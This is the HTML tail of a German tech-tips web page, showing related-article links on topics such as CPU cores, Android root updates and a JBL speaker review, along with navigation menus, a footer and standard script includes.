loading=lazy loading=lazy></div> <a href="https://storerarity.ru/de/kak-vklyuchit-vse-yadra-kak-vklyuchit-vse-yadra-processora-kak-vklyuchit.html">So aktivieren Sie alle Prozessorkerne. So aktivieren Sie alle Prozessoren unter Windows 10</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/79844ffc013d287bb7adc7f3dabe3e13.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/de/jbl-go-ne-rabotaet-obzor-besprovodnoi-kolonki-jbl-go-plyusy-i-minusy-jbl.html">Testbericht zum kabellosen JBL Go-Lautsprecher</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/programs/">Programme</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/devices/">Geräte</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/browsers/">Browser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/reviews/">Rezensionen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/reviews/">Rezensionen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/setup/">Einstellungen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/torrent/">Torrent</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/editors/">Herausgeber</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/instagram/">Instagram</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">Die letzten Notizen</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/95236f72f3e17d8b09868145a5ad3403.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="FlashFire ist eine neue Anwendung zum Aktualisieren von Android, ohne Root zu verlieren" / loading=lazy loading=lazy> <span class="cat">Programme</span></div> <a href="https://storerarity.ru/de/root-sletaet-flashfire-novoe-prilozhenie-dlya-obnovleniya-android-bez-utraty-ruta-poteryayu.html">FlashFire ist eine neue Anwendung zum Aktualisieren von Android, ohne Root zu verlieren</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/e2b88b416324d601a10ad22e6eb523e9.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Steuern Sie Ihr Telefon von Ihrem Computer aus" / loading=lazy loading=lazy> <span class="cat">Programme</span></div> <a href="https://storerarity.ru/de/peredacha-ekrana-mobilnika-na-kompyuter-upravlenie-telefonom-s-kompyutera.html">Steuern Sie Ihr Telefon von Ihrem Computer aus</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/08ff898ce3f043c159e55cbc5f956187.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="So richten Sie das drahtlose Xiaomi-Display ein" / loading=lazy loading=lazy> <span class="cat">Programme</span></div> <a href="https://storerarity.ru/de/besprovodnoi-displei-xiaomi-kak-nastroit-noutbuk-kak-nastroit.html">So richten Sie das drahtlose Xiaomi-Display ein</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Computer für jedermann – Einrichtung, Installation, Wiederherstellung</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/programs/">Programme</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/devices/">Geräte</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/browsers/">Browser</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/reviews/">Rezensionen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/reviews/">Rezensionen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/setup/">Einstellungen</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/de/category/torrent/">Torrent</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>